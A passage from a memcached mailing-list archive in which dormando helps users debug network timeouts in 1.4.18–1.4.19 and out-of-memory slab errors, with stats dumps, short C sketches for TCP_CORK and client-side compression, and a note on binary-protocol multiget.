  On Wednesday, May 7, 2014 5:38:47 PM UTC-7, Dormando wrote:
That doesn't really tell us anything about the nature of the problem
though. With 2 threads it might still happen, but is a lot less 
  likely.
 
On Wed, 7 May 2014, notifi...@commando.io wrote:
 
 Bumped up to 2 threads and so far no timeout errors. I'm going to 
  let it run for a few more days, then revert back to 4 threads and
see if timeout
 errors come up again. That will tell us the problem lies in 
  spawning more than 2 threads.

 On Wednesday, May 7, 2014 5:19:13 PM UTC-7, Dormando wrote:
       Hey,

       try this branch:
       https://github.com/dormando/memcached/tree/double_close

       so far as I can tell that emulates the behavior in .17...

       to build:
       ./autogen.sh && ./configure && make

       run it in screen like you were doing with the other tests, 
  see if it
       prints "ERROR: Double Close [somefd]". If it prints that once 
  then stops,
       I guess that's what .17 was doing... if it print spams, then 
  something
       else may have changed.

       I'm mostly convinced something about your OS or build is 
  corrupt, but I
       have no idea what it is. The only other thing I can think of 
  is to
       instrument .17 a bit more and have you try that (with the 
  connection code
       laid out the old way, but with a conn_closed flag to detect a 
  double close
       attempt), and see if the old .17 still did it.

       On Tue, 6 May 2014, notifi...@commando.io wrote:

        Changing from 4 threads to 1 seems to have resolved the 
  problem. No timeouts since. Should I set to 2 threads and wait and
see how
       things go?
       
        On Tuesday, May 6, 2014 12:07:08 AM UTC-7, Dormando wrote:
              and how'd that work out?
       
              Still no other reports :/ a few thousand more 
  downloads of .19...
       
              On Sun, 4 May 2014, notifi...@commando.io wrote:
       
               I'm going to try switching threads from 4 to 1. 
  This host web2 is the only one I am seeing it on, but it also is
the only
       host
              that gets any
               real traffic. Super frustrating.
              
               On Sunday, May 4, 2014 10:12:08 AM UTC-7, Dormando 
  wrote:
                     I'm stumped. (also, your e-mails aren't 
  updating the ticket...).
              
                     It's impossible for a connection to get into 
  the closed state without
                     having event_del() and close() called on the 
  socket. A socket slot isn't
                     event_add()'ed again until after the state is 
  reset to 'init_state'.
              
                     There was no code path for event_del to 
  actually fail so far as I could
                     see.
              
                     I've e-mailed steven grimm for ideas but 
  either that's not his e-mail
                     anymore or he's not going to respond.
              
                     I really don't know. I guess the old code 
  would've just called conn_close
                     again by accident... I don't see how the 
  logic changed in any significant
                     way in .18. Though again, if it happened with 
  any frequency people's
                     curr_conns stat would go negative.
              
                     So... either that always happened and we 
  never noticed, or your particular

Re: MEMCACHED_SERVER_MEMORY_ALLOCATION_FAILURE (SERVER_ERROR out of memory storing object) error

2014-05-08 Thread dormando
 Dormando,Yes, have to admit - we cache too aggressively (just do not want to 
 use different less polite word :)).

 Going to do two test experiments: enable compression and auto reallocation. 
 Before doing this:
 1) why auto reallocation is not enabled by default, what issues/disadvantage 
 to expect?

Because it pulls memory from other places and evicts those items
regardless of whether they were still valid or expired. There's no way for it
to reassign slab pages of just expired memory. Some people would prefer
to just let evictions fall from the tail (least used) rather than do this,
so we didn't change the defaults after introducing the feature.

 2) why memcached does not have compression on server side if CPU is idle, 
 because of ideology to keep it simple and fast? (just asking)

I said already: in the typical use case there are many more clients, and a
very high rate of usage. If you flipped where the compression happens the
server would run out of CPU very quickly, and be much more latent. We
could support it in the server but it'd be a very low priority feature.

 On Tuesday, May 6, 2014 6:40:07 PM UTC-7, Dormando wrote:
Hi Dormando,
Full Slabs and Items stats are below. The problem is that other slabs 
 are full too, so rebalancing is not trivial. I will try to
   create a wrapper
that will do some analysis and do slab rebalancing based on stats 
 (the idea is to try to shrink slabs with low eviction, but I need to
   think more).
But i see there is Slabs Automove in protocol.txt. Do you recommend 
 it?

   If it fits your needs. Otherwise, write an external daemon that controls
   the automover based on your own needs.

You either need to add more memory to the total system or rebalance 
 them. 
we run many-many memcached servers with 30Gb+ memory each box. And 
 the problem occurs on some boxes periodically. So I am thinking
   how to convert
manual restart to automatic action.

   I'm not sure why restarting will fix it, if above you say rebalancing 
 is
   not trivial. If restarting would fix it, rebalancing would also fix it.

   From the stats below, you do have a fair amount of memory spread out
   among the higher order slab classes. Compression, or otherwise
   re-evaluating how you store those values may make a big difference.

   There's also a huge amount of stuff being evicted without ever being
   fetched again. Are you caching too aggressively, or is memory just way 
 too
   small and they never get a chance to be fetched after being set?

   I'm just eyeballing it but evicted_time seems pretty short (a matter of
   hours). That's the last access time of the last object to be evicted...
   and it's like that across most of your slab classes.

   So, shuffle and compress and whatnot, but I think you're out of ram 
 dude.

server
stats
STAT pid 15480
STAT uptime 2476264
STAT time 1399422427
STAT version 1.4.15
STAT libevent 1.4.13-stable
STAT pointer_size 64
STAT rusage_user 639012.117392
STAT rusage_system 2076810.323840
STAT curr_connections 5237
STAT total_connections 122995977
STAT connection_structures 23402
STAT reserved_fds 40
STAT cmd_get 91928675147
STAT cmd_set 4358475896
STAT cmd_flush 1
STAT cmd_touch 0
STAT get_hits 85005900667
STAT get_misses 6922774480
STAT delete_misses 4238049567
STAT delete_hits 885535057
STAT incr_misses 0
STAT incr_hits 0
STAT decr_misses 0
STAT decr_hits 0
STAT cas_misses 1074
STAT cas_hits 4784930
STAT cas_badval 14966
STAT touch_hits 0
STAT touch_misses 0
STAT auth_cmds 0
STAT auth_errors 0
STAT bytes_read 32317259718167
STAT bytes_written 221039272582722
STAT limit_maxbytes 25769803776
STAT accepting_conns 1
STAT listen_disabled_num 0
STAT threads 8
STAT conn_yields 0
STAT hash_power_level 25
STAT hash_bytes 268435456
STAT hash_is_expanding 0
STAT slab_reassign_running 0
STAT slabs_moved 0
STAT bytes 23567307974
STAT curr_items 32559669
STAT total_items 61290586
STAT expired_unfetched 6664504
STAT evicted_unfetched 1244432758
STAT evictions 2522683859
STAT reclaimed 7626148
END
   
   
   
stats slabs
STAT 1:chunk_size 96
STAT 1:chunks_per_page 10922
STAT 1:total_pages 1
STAT 1:total_chunks 10922
STAT 1:used_chunks 0
STAT 1:free_chunks 10922
STAT 1:free_chunks_end 0
STAT 1:mem_requested 0
STAT 1:get_hits 9905
STAT 1:cmd_set 10362
STAT 1:delete_hits 9582
STAT 1:incr_hits 0
STAT 1:decr_hits

Re: Issue 363 in memcached: MemcachePool::get(): Server 127.0.0.1 (tcp 11211, udp 0) failed with: Network timeout

2014-05-07 Thread dormando
Hey,

try this branch:
https://github.com/dormando/memcached/tree/double_close

so far as I can tell that emulates the behavior in .17...

to build:
./autogen.sh && ./configure && make

run it in screen like you were doing with the other tests, see if it
prints "ERROR: Double Close [somefd]". If it prints that once then stops,
I guess that's what .17 was doing... if it print spams, then something
else may have changed.

I'm mostly convinced something about your OS or build is corrupt, but I
have no idea what it is. The only other thing I can think of is to
instrument .17 a bit more and have you try that (with the connection code
laid out the old way, but with a conn_closed flag to detect a double close
attempt), and see if the old .17 still did it.

On Tue, 6 May 2014, notificati...@commando.io wrote:

 Changing from 4 threads to 1 seems to have resolved the problem. No timeouts 
 since. Should I set to 2 threads and wait and see how things go?

 On Tuesday, May 6, 2014 12:07:08 AM UTC-7, Dormando wrote:
   and how'd that work out?

   Still no other reports :/ a few thousand more downloads of .19...

   On Sun, 4 May 2014, notifi...@commando.io wrote:

I'm going to try switching threads from 4 to 1. This host web2 is 
 the only one I am seeing it on, but it also is the only host
   that gets any
real traffic. Super frustrating.
   
On Sunday, May 4, 2014 10:12:08 AM UTC-7, Dormando wrote:
      I'm stumped. (also, your e-mails aren't updating the ticket...).
   
      It's impossible for a connection to get into the closed state 
 without
      having event_del() and close() called on the socket. A socket 
 slot isn't
      event_add()'ed again until after the state is reset to 
 'init_state'.
   
      There was no code path for event_del to actually fail so far as 
 I could
      see.
   
      I've e-mailed steven grimm for ideas but either that's not his 
 e-mail
      anymore or he's not going to respond.
   
      I really don't know. I guess the old code would've just called 
 conn_close
      again by accident... I don't see how the logic changed in any 
 significant
      way in .18. Though again, if it happened with any frequency 
 people's
      curr_conns stat would go negative.
   
      So... either that always happened and we never noticed, or your 
 particular
      OS is corrupt. There're probably 10,000+ installs of .18+ now 
 and only one
      complaint, so I'm a little hesitant to spend a ton of time on 
 this until
      we get more reports.
   
      You should downgrade to .17.
   
      On Sun, 4 May 2014, notifi...@commando.io wrote:
   
       Damn it, got network timeout. CPU 3 is using 100% cpu from 
 memcached.
       Here is the result of stat to verify using new version of 
 memcached and libevent:
      
       STAT version 1.4.19
       STAT libevent 2.0.18-stable
      
      
       On Saturday, May 3, 2014 11:55:31 PM UTC-7, 
 notifi...@commando.io wrote:
             Just upgraded all 5 web-servers to memcached 1.4.19 
 with libevent 2.0.18. Will advise if I see memcached timeouts.
   Should be
      good
             though.
      
       Thanks so much for all the help and patience. Really 
 appreciated.
      
       On Friday, May 2, 2014 10:20:26 PM UTC-7, 
 memc...@googlecode.com wrote:
             Updates:
             Status: Invalid
      
             Comment #20 on issue 363 by dorma...@rydia.net: 
 MemcachePool::get(): Server  
             127.0.0.1 (tcp 11211, udp 0) failed with: Network 
 timeout
             http://code.google.com/p/memcached/issues/detail?id=363
      
             Any repeat crashes? I'm going to close this. it looks 
 like remi  
             shipped .19. reopen or open a new one if it hangs in 
 the same way somehow...
      
             Well. 19 won't be printing anything, and it won't hang, 
 but if it's  
             actually our bug and not libevent it would end up 
 spinning CPU. Keep an eye  
             out I guess.
      
             --
             You received this message because this project is 
 configured to send all  
             issue notifications to this address.
             You may adjust your notification preferences at:
             https://code.google.com/hosting/settings
      

Re: Multi-get implementation in binary protocol

2014-05-07 Thread dormando
 Hello,

 For now, I'm trying to evaluate the performance of memcached server by using 
 several client workloads.
 I have a question about multi-get implementation in binary protocol.
 As I know, in ascii protocol, we can send multiple keys in a single request 
 packet to implement multi-get.

 But, in a binary protocol, it seems that we should send multiple request 
 packets (one request packet per key) to implement multi-get.
 Even if we send multiple getQ requests, then a get for the last key, we can 
 only save response packets for cache misses.
 If I understand correctly, multi-get in binary protocol cannot reduce the 
 number of request packets, and
 it also cannot reduce the number of response packets if hit-ratio is very 
 high (like 99% get hit).

 If the performance bottleneck is on the network side not on the CPU, I think 
 reducing the number of packets is still very important,
 but I don't understand why the binary protocol doesn't care about this.
 Did I miss something?

you're right, it sucks. I was never happy with it, but haven't had time to
add adjustments to the protocol for this. To note, with .19 some
inefficiencies with the protocol were lifted, and most network cards are
fast enough for most situations, even if it's one packet per response (and
for large enough responses they split into multiple packets, anyway).

The reason why this was done is for latency and streaming of responses:

- In ascii multiget, I can send 10,000 keys, but then I'm forced to wait for
the server to look up all of the keys before it sends any responses. The
delay isn't typically very high, but there's some latency to it.

- In binary multiget, the responses are sent back as it receives them from
the network more or less. This reduces the latency to when you start
seeing responses, regardless of how large your multiget is. this is useful
if you have a kind of client which can start processing responses in a
streaming fashion. This potentially reduces the total time to render your
response since you can keep the CPU busy unmarshalling responses instead
of sleeping.

However, it should have some tunables: One where it at least does one
write per complete packet (TCP_CORK'ed, or similar), and one where it
buffers up to some size. In my tests I can get ascii multiget up to 16.2
million keys/sec, but (with the fixes in .19) binprot caps out at 4.6m and
is spending all of its time calling sendmsg(). Most people need far, far
less than that, so the binprot as is should be okay though.
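
(For reference, the corking idea looks roughly like this on Linux; this is
a sketch of the general technique, not memcached code. While corked, the
kernel coalesces small writes into full-size frames; uncorking flushes
whatever is pending:)

    #include <netinet/in.h>
    #include <netinet/tcp.h>   /* TCP_CORK, Linux-specific */
    #include <sys/socket.h>

    static void cork(int fd, int on) {
        /* on=1 before a burst of small writes, on=0 to flush the batch */
        setsockopt(fd, IPPROTO_TCP, TCP_CORK, &on, sizeof(on));
    }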

The code isn't too friendly to this and there're other higher priority
things I'd like to get done sooner. The relatively few number of people
who do 500,000+ requests per second in binprot (they're almost always
ascii at that scale) is the other reason.



Re: Issue 363 in memcached: MemcachePool::get(): Server 127.0.0.1 (tcp 11211, udp 0) failed with: Network timeout

2014-05-07 Thread dormando
That doesn't really tell us anything about the nature of the problem
though. With 2 threads it might still happen, but is a lot less likely.

On Wed, 7 May 2014, notificati...@commando.io wrote:

 Bumped up to 2 threads and so far no timeout errors. I'm going to let it run 
 for a few more days, then revert back to 4 threads and see if timeout
 errors come up again. That will tell us the problem lies in spawning more 
 than 2 threads.

 On Wednesday, May 7, 2014 5:19:13 PM UTC-7, Dormando wrote:
   Hey,

   try this branch:
   https://github.com/dormando/memcached/tree/double_close

   so far as I can tell that emulates the behavior in .17...

   to build:
   ./autogen.sh && ./configure && make

   run it in screen like you were doing with the other tests, see if it
   prints "ERROR: Double Close [somefd]". If it prints that once then 
 stops,
   I guess that's what .17 was doing... if it print spams, then something
   else may have changed.

   I'm mostly convinced something about your OS or build is corrupt, but I
   have no idea what it is. The only other thing I can think of is to
   instrument .17 a bit more and have you try that (with the connection 
 code
   laid out the old way, but with a conn_closed flag to detect a double 
 close
   attempt), and see if the old .17 still did it.

   On Tue, 6 May 2014, notifi...@commando.io wrote:

Changing from 4 threads to 1 seems to have resolved the problem. No 
 timeouts since. Should I set to 2 threads and wait and see how
   things go?
   
On Tuesday, May 6, 2014 12:07:08 AM UTC-7, Dormando wrote:
      and how'd that work out?
   
      Still no other reports :/ a few thousand more downloads of 
 .19...
   
      On Sun, 4 May 2014, notifi...@commando.io wrote:
   
       I'm going to try switching threads from 4 to 1. This host 
 web2 is the only one I am seeing it on, but it also is the only
   host
      that gets any
       real traffic. Super frustrating.
      
       On Sunday, May 4, 2014 10:12:08 AM UTC-7, Dormando wrote:
             I'm stumped. (also, your e-mails aren't updating the 
 ticket...).
      
             It's impossible for a connection to get into the closed 
 state without
             having event_del() and close() called on the socket. A 
 socket slot isn't
             event_add()'ed again until after the state is reset to 
 'init_state'.
      
             There was no code path for event_del to actually fail 
 so far as I could
             see.
      
             I've e-mailed steven grimm for ideas but either that's 
 not his e-mail
             anymore or he's not going to respond.
      
             I really don't know. I guess the old code would've just 
 called conn_close
             again by accident... I don't see how the logic changed 
 in any significant
             way in .18. Though again, if it happened with any 
 frequency people's
             curr_conns stat would go negative.
      
             So... either that always happened and we never noticed, 
 or your particular
             OS is corrupt. There're probably 10,000+ installs of 
 .18+ now and only one
             complaint, so I'm a little hesitant to spend a ton of 
 time on this until
             we get more reports.
      
             You should downgrade to .17.
      
             On Sun, 4 May 2014, notifi...@commando.io wrote:
      
              Damn it, got network timeout. CPU 3 is using 100% cpu 
 from memcached.
              Here is the result of stat to verify using new 
 version of memcached and libevent:
             
              STAT version 1.4.19
              STAT libevent 2.0.18-stable
             
             
              On Saturday, May 3, 2014 11:55:31 PM UTC-7, 
 notifi...@commando.io wrote:
                    Just upgraded all 5 web-servers to memcached 
 1.4.19 with libevent 2.0.18. Will advise if I see memcached
   timeouts.
      Should be
             good
                    though.
             
              Thanks so much for all the help and patience. Really 
 appreciated.
             
              On Friday, May 2, 2014 10:20:26 PM UTC-7, 
 memc...@googlecode.com wrote:
                    Updates:
                    Status: Invalid
             
                    Comment #20 on issue 363 by dorma...@rydia.net: 
 MemcachePool::get(): Server  
                    127.0.0.1 (tcp 11211, udp 0) failed with: 
 Network timeout

Re: Issue 363 in memcached: MemcachePool::get(): Server 127.0.0.1 (tcp 11211, udp 0) failed with: Network timeout

2014-05-06 Thread dormando
and how'd that work out?

Still no other reports :/ a few thousand more downloads of .19...

On Sun, 4 May 2014, notificati...@commando.io wrote:

 I'm going to try switching threads from 4 to 1. This host web2 is the only 
 one I am seeing it on, but it also is the only host that gets any
 real traffic. Super frustrating.

 On Sunday, May 4, 2014 10:12:08 AM UTC-7, Dormando wrote:
   I'm stumped. (also, your e-mails aren't updating the ticket...).

   It's impossible for a connection to get into the closed state without
   having event_del() and close() called on the socket. A socket slot isn't
   event_add()'ed again until after the state is reset to 'init_state'.

   There was no code path for event_del to actually fail so far as I could
   see.

   I've e-mailed steven grimm for ideas but either that's not his e-mail
   anymore or he's not going to respond.

   I really don't know. I guess the old code would've just called 
 conn_close
   again by accident... I don't see how the logic changed in any 
 significant
   way in .18. Though again, if it happened with any frequency people's
   curr_conns stat would go negative.

   So... either that always happened and we never noticed, or your 
 particular
   OS is corrupt. There're probably 10,000+ installs of .18+ now and only 
 one
   complaint, so I'm a little hesitant to spend a ton of time on this until
   we get more reports.

   You should downgrade to .17.

   On Sun, 4 May 2014, notifi...@commando.io wrote:

Damn it, got network timeout. CPU 3 is using 100% cpu from memcached.
Here is the result of stat to verify using new version of memcached 
 and libevent:
   
STAT version 1.4.19
STAT libevent 2.0.18-stable
   
   
On Saturday, May 3, 2014 11:55:31 PM UTC-7, notifi...@commando.io 
 wrote:
      Just upgraded all 5 web-servers to memcached 1.4.19 with 
 libevent 2.0.18. Will advise if I see memcached timeouts. Should be
   good
      though.
   
Thanks so much for all the help and patience. Really appreciated.
   
On Friday, May 2, 2014 10:20:26 PM UTC-7, memc...@googlecode.com 
 wrote:
      Updates:
      Status: Invalid
   
      Comment #20 on issue 363 by dorma...@rydia.net: 
 MemcachePool::get(): Server  
      127.0.0.1 (tcp 11211, udp 0) failed with: Network timeout
      http://code.google.com/p/memcached/issues/detail?id=363
   
      Any repeat crashes? I'm going to close this. it looks like remi 
  
      shipped .19. reopen or open a new one if it hangs in the same 
 way somehow...
   
      Well. 19 won't be printing anything, and it won't hang, but if 
 it's  
      actually our bug and not libevent it would end up spinning CPU. 
 Keep an eye  
      out I guess.
   
      --
      You received this message because this project is configured to 
 send all  
      issue notifications to this address.
      You may adjust your notification preferences at:
      https://code.google.com/hosting/settings
   


Re: MEMCACHED_SERVER_MEMORY_ALLOCATION_FAILURE (SERVER_ERROR out of memory storing object) error

2014-05-06 Thread dormando

 Hi,
 Does anybody know good way to handle OOM during set operation? Server is 
 fully calcified :) (no new pages to allocate) and i have this issue for
 slab 17
 STAT items:17:number 16128
 STAT items:17:age 90
 STAT items:17:evicted 246790897
 STAT items:17:evicted_nonzero 246790874
 STAT items:17:evicted_time 90
 STAT items:17:outofmemory 33098
 STAT items:17:tailrepairs 0
 STAT items:17:reclaimed 1183
 STAT items:17:expired_unfetched 196
 STAT items:17:evicted_unfetched 143699820

 running memcached : STAT version 1.4.15

stats slabs ? Is memory unbalanced from other slabs?

 nothing except rebooting periodically comes to mind, but this solution does 
 not make me happy :)

There's the slab rebalance feature. OOM errors only happen when there is
truly very few pages free and all of the ones in the tail are locked, or
there's a bug. It should always evict. The rebalance feature is documented
in doc/protocol.txt.
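
(For reference, the runtime knobs look like this -- assuming the server was
started with -o slab_reassign so page moving is enabled at all; the exact
syntax is in doc/protocol.txt:)

    slabs reassign <source class> <dest class>   move one page between classes
    slabs automove 1                             let the server pick moves itself
    slabs automove 0                             stop the automover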

However your eviction seems to be very highly pressured. The
evicted_unfetched stat is high compared to the total number of evictions.
So they're not even staying in long enough to get fetched again. There
aren't that many OOM errors overall, so perhaps you are just hitting that
slab way too hard and occasionally locking everything in the tail.

You either need to add more memory to the total system or rebalance them.

 Another option: enable compression to allow more items, but I need to experiment. 
 (Why does memcached not provide server-side compression? As I see in
 stats, memcached CPU is not used, so it would be good to utilize it.) 

Very high rate of access is expected and the ratio of clients to servers
might be high, so compression is done in the client instead. It was also
designed to let you run it wherever there's free memory (extra installed
in webservers/etc) so it wants to avoid excess cpu usage.

It's a trivial switch either way.
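
(Client-side, the switch usually amounts to compressing before the set and
setting a flag bit so readers know to decompress; a bare-bones sketch with
zlib, where the 1KB threshold and the flag convention are illustrative:)

    #include <string.h>
    #include <zlib.h>

    /* Returns 1 and fills out/outlen if the value was worth compressing;
     * the caller would store 'out' with a COMPRESSED flag set on the item. */
    static int maybe_compress(const char *val, size_t len,
                              char *out, size_t *outlen) {
        if (len < 1024)
            return 0;                          /* too small to bother */
        uLongf dlen = compressBound(len);
        if (dlen > *outlen)
            return 0;                          /* caller's buffer too small */
        if (compress((Bytef *)out, &dlen, (const Bytef *)val, len) != Z_OK)
            return 0;
        *outlen = dlen;
        return 1;
    }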

Also consider upgrading to .17 or .19. might be some good fixes.



Re: MEMCACHED_SERVER_MEMORY_ALLOCATION_FAILURE (SERVER_ERROR out of memory storing object) error

2014-05-06 Thread dormando
 Hi Dormando,
 Full Slabs and Items stats are below. The problem is that other slabs are 
 full too, so rebalancing is not trivial. I will try to create a wrapper
 that will do some analysis and do slab rebalancing based on stats (the idea 
 is to try to shrink slabs with low eviction, but I need to think more).
 But i see there is Slabs Automove in protocol.txt. Do you recommend it?

If it fits your needs. Otherwise, write an external daemon that controls
the automover based on your own needs.
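
(A skeleton of such an external controller, in C; the address, the class
numbers, and the one-shot policy are all illustrative -- a real daemon
would loop, poll "stats items" for per-class eviction deltas, and pick the
source/dest classes itself:)

    #include <arpa/inet.h>
    #include <netinet/in.h>
    #include <stdint.h>
    #include <stdio.h>
    #include <string.h>
    #include <sys/socket.h>
    #include <unistd.h>

    /* Connect to memcached and issue one ascii admin command, printing
     * the single-line reply (OK, BUSY, etc.). */
    static int mc_command(const char *ip, int port, const char *cmd) {
        int fd = socket(AF_INET, SOCK_STREAM, 0);
        struct sockaddr_in sa = { 0 };
        sa.sin_family = AF_INET;
        sa.sin_port = htons((uint16_t)port);
        inet_pton(AF_INET, ip, &sa.sin_addr);
        if (connect(fd, (struct sockaddr *)&sa, sizeof(sa)) != 0)
            return -1;
        char buf[256];
        int n = snprintf(buf, sizeof(buf), "%s\r\n", cmd);
        write(fd, buf, n);
        n = read(fd, buf, sizeof(buf) - 1);
        if (n > 0) { buf[n] = '\0'; fputs(buf, stdout); }
        close(fd);
        return 0;
    }

    int main(void) {
        /* hypothetical move: donate a page from class 5 to class 17 */
        return mc_command("127.0.0.1", 11211, "slabs reassign 5 17");
    }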

 You either need to add more memory to the total system or rebalance them. 
 we run many-many memcached servers with 30Gb+ memory each box. And the 
 problem occurs on some boxes periodically. So I am thinking how to convert
 manual restart to automatic action.

I'm not sure why restarting will fix it, if above you say rebalancing is
not trivial. If restarting would fix it, rebalancing would also fix it.

From the stats below, you do have a fair amount of memory spread out
among the higher order slab classes. Compression, or otherwise
re-evaluating how you store those values may make a big difference.

There's also a huge amount of stuff being evicted without ever being
fetched again. Are you caching too aggressively, or is memory just way too
small and they never get a chance to be fetched after being set?

I'm just eyeballing it but evicted_time seems pretty short (a matter of
hours). That's the last access time of the last object to be evicted...
and it's like that across most of your slab classes.

So, shuffle and compress and whatnot, but I think you're out of ram dude.

 server
 stats
 STAT pid 15480
 STAT uptime 2476264
 STAT time 1399422427
 STAT version 1.4.15
 STAT libevent 1.4.13-stable
 STAT pointer_size 64
 STAT rusage_user 639012.117392
 STAT rusage_system 2076810.323840
 STAT curr_connections 5237
 STAT total_connections 122995977
 STAT connection_structures 23402
 STAT reserved_fds 40
 STAT cmd_get 91928675147
 STAT cmd_set 4358475896
 STAT cmd_flush 1
 STAT cmd_touch 0
 STAT get_hits 85005900667
 STAT get_misses 6922774480
 STAT delete_misses 4238049567
 STAT delete_hits 885535057
 STAT incr_misses 0
 STAT incr_hits 0
 STAT decr_misses 0
 STAT decr_hits 0
 STAT cas_misses 1074
 STAT cas_hits 4784930
 STAT cas_badval 14966
 STAT touch_hits 0
 STAT touch_misses 0
 STAT auth_cmds 0
 STAT auth_errors 0
 STAT bytes_read 32317259718167
 STAT bytes_written 221039272582722
 STAT limit_maxbytes 25769803776
 STAT accepting_conns 1
 STAT listen_disabled_num 0
 STAT threads 8
 STAT conn_yields 0
 STAT hash_power_level 25
 STAT hash_bytes 268435456
 STAT hash_is_expanding 0
 STAT slab_reassign_running 0
 STAT slabs_moved 0
 STAT bytes 23567307974
 STAT curr_items 32559669
 STAT total_items 61290586
 STAT expired_unfetched 6664504
 STAT evicted_unfetched 1244432758
 STAT evictions 2522683859
 STAT reclaimed 7626148
 END



 stats slabs
 STAT 1:chunk_size 96
 STAT 1:chunks_per_page 10922
 STAT 1:total_pages 1
 STAT 1:total_chunks 10922
 STAT 1:used_chunks 0
 STAT 1:free_chunks 10922
 STAT 1:free_chunks_end 0
 STAT 1:mem_requested 0
 STAT 1:get_hits 9905
 STAT 1:cmd_set 10362
 STAT 1:delete_hits 9582
 STAT 1:incr_hits 0
 STAT 1:decr_hits 0
 STAT 1:cas_hits 0
 STAT 1:cas_badval 0
 STAT 1:touch_hits 0
 STAT 2:chunk_size 120
 STAT 2:chunks_per_page 8738
 STAT 2:total_pages 1
 STAT 2:total_chunks 8738
 STAT 2:used_chunks 13
 STAT 2:free_chunks 8725
 STAT 2:free_chunks_end 0
 STAT 2:mem_requested 1350
 STAT 2:get_hits 1309125
 STAT 2:cmd_set 2963710
 STAT 2:delete_hits 199018
 STAT 2:incr_hits 0
 STAT 2:decr_hits 0
 STAT 2:cas_hits 770681
 STAT 2:cas_badval 3697
 STAT 2:touch_hits 0
 STAT 3:chunk_size 152
 STAT 3:chunks_per_page 6898
 STAT 3:total_pages 5
 STAT 3:total_chunks 34490
 STAT 3:used_chunks 34240
 STAT 3:free_chunks 250
 STAT 3:free_chunks_end 0
 STAT 3:mem_requested 483
 STAT 3:get_hits 2088979
 STAT 3:cmd_set 4355223
 STAT 3:delete_hits 3392
 STAT 3:incr_hits 0
 STAT 3:decr_hits 0
 STAT 3:cas_hits 0
 STAT 3:cas_badval 0
 STAT 3:touch_hits 0
 STAT 4:chunk_size 192
 STAT 4:chunks_per_page 5461
 STAT 4:total_pages 11
 STAT 4:total_chunks 60071
 STAT 4:used_chunks 60070
 STAT 4:free_chunks 1
 STAT 4:free_chunks_end 0
 STAT 4:mem_requested 10821971
 STAT 4:get_hits 65413752
 STAT 4:cmd_set 22935889
 STAT 4:delete_hits 6028
 STAT 4:incr_hits 0
 STAT 4:decr_hits 0
 STAT 4:cas_hits 0
 STAT 4:cas_badval 0
 STAT 4:touch_hits 0
 STAT 5:chunk_size 240
 STAT 5:chunks_per_page 4369
 STAT 5:total_pages 756
 STAT 5:total_chunks 3302964
 STAT 5:used_chunks 3302964
 STAT 5:free_chunks 0
 STAT 5:free_chunks_end 0
 STAT 5:mem_requested 766866823
 STAT 5:get_hits 2762768607
 STAT 5:cmd_set 445418784
 STAT 5:delete_hits 15806705
 STAT 5:incr_hits 0
 STAT 5:decr_hits 0
 STAT 5:cas_hits 0
 STAT 5:cas_badval 0
 STAT 5:touch_hits 0
 STAT 6:chunk_size 304
 STAT 6:chunks_per_page 3449
 STAT 6:total_pages 2304
 STAT 6:total_chunks 7946496
 STAT 6:used_chunks 7946496
 STAT 6:free_chunks 0
 STAT 6:free_chunks_end 0
 STAT 6

Re: Issue 363 in memcached: MemcachePool::get(): Server 127.0.0.1 (tcp 11211, udp 0) failed with: Network timeout

2014-05-04 Thread dormando
I'm stumped. (also, your e-mails aren't updating the ticket...).

It's impossible for a connection to get into the closed state without
having event_del() and close() called on the socket. A socket slot isn't
event_add()'ed again until after the state is reset to 'init_state'.

There was no code path for event_del to actually fail so far as I could
see.
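
In other words, the invariant is: deregister and close strictly before the
state goes to closed, and re-register only after the state is back to init.
A toy model of that ordering (assumed shape for illustration, not the
literal memcached source):

    #include <assert.h>
    #include <stdbool.h>
    #include <stdio.h>

    /* Model: the libevent registration always comes off before close(),
     * and only goes back on after the state is reset to init. */
    enum conn_states { conn_init, conn_working, conn_closed };

    struct conn {
        enum conn_states state;
        bool event_registered;       /* stands in for event_add()/event_del() */
    };

    static void conn_close(struct conn *c) {
        assert(c->event_registered); /* closing implies event_del() first */
        c->event_registered = false; /* event_del() */
        /* close(c->sfd) would happen here */
        c->state = conn_closed;      /* slot stays out of libevent... */
    }

    static void conn_reuse(struct conn *c) {
        assert(!c->event_registered);
        c->state = conn_init;        /* ...until reset to init_state */
        c->event_registered = true;  /* only then event_add() again */
    }

    int main(void) {
        struct conn c = { conn_working, true };
        conn_close(&c);
        conn_reuse(&c);
        printf("state=%d registered=%d\n", (int)c.state, (int)c.event_registered);
        return 0;
    }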

I've e-mailed steven grimm for ideas but either that's not his e-mail
anymore or he's not going to respond.

I really don't know. I guess the old code would've just called conn_close
again by accident... I don't see how the logic changed in any significant
way in .18. Though again, if it happened with any frequency people's
curr_conns stat would go negative.

So... either that always happened and we never noticed, or your particular
OS is corrupt. There're probably 10,000+ installs of .18+ now and only one
complaint, so I'm a little hesitant to spend a ton of time on this until
we get more reports.

You should downgrade to .17.

On Sun, 4 May 2014, notificati...@commando.io wrote:

 Damn it, got network timeout. CPU 3 is using 100% cpu from memcached.
 Here is the result of stat to verify using new version of memcached and 
 libevent:

 STAT version 1.4.19
 STAT libevent 2.0.18-stable


 On Saturday, May 3, 2014 11:55:31 PM UTC-7, notifi...@commando.io wrote:
   Just upgraded all 5 web-servers to memcached 1.4.19 with libevent 
 2.0.18. Will advise if I see memcached timeouts. Should be good
   though.

 Thanks so much for all the help and patience. Really appreciated.

 On Friday, May 2, 2014 10:20:26 PM UTC-7, memc...@googlecode.com wrote:
   Updates:
   Status: Invalid

   Comment #20 on issue 363 by dorma...@rydia.net: MemcachePool::get(): 
 Server  
   127.0.0.1 (tcp 11211, udp 0) failed with: Network timeout
   http://code.google.com/p/memcached/issues/detail?id=363

   Any repeat crashes? I'm going to close this. it looks like remi  
   shipped .19. reopen or open a new one if it hangs in the same way 
 somehow...

   Well, .19 won't be printing anything, and it won't hang, but if it's
   actually our bug and not libevent it would end up spinning CPU. Keep an
   eye out I guess.

   --
   You received this message because this project is configured to send 
 all  
   issue notifications to this address.
   You may adjust your notification preferences at:
   https://code.google.com/hosting/settings






1.4.19

2014-05-01 Thread dormando
http://code.google.com/p/memcached/wiki/ReleaseNotes1419

Thanks to everyone who helped out with the bugfixes for this release.
Don't want to get my hopes up but I think we're finally running out of
segfaults and refcount leaks (until we go changing more stuff again..).



Re: Memcached 1.4.19 Build Not Working - Compiling from Source

2014-05-01 Thread dormando
What's the output of:

$ prove -v t/lru-crawler.t

How long are the tests taking to run? This has definitely been tested on
ubuntu 12.04 (which is what I assume you meant?), but not something with
so little RAM.

On Thu, 1 May 2014, Wilfred Khalik wrote:

 Hi guys,

 I get the below failure error when I run the make test command:

 Any help would be appreciated. I am running this on a 512MB Digital Ocean VPS by 
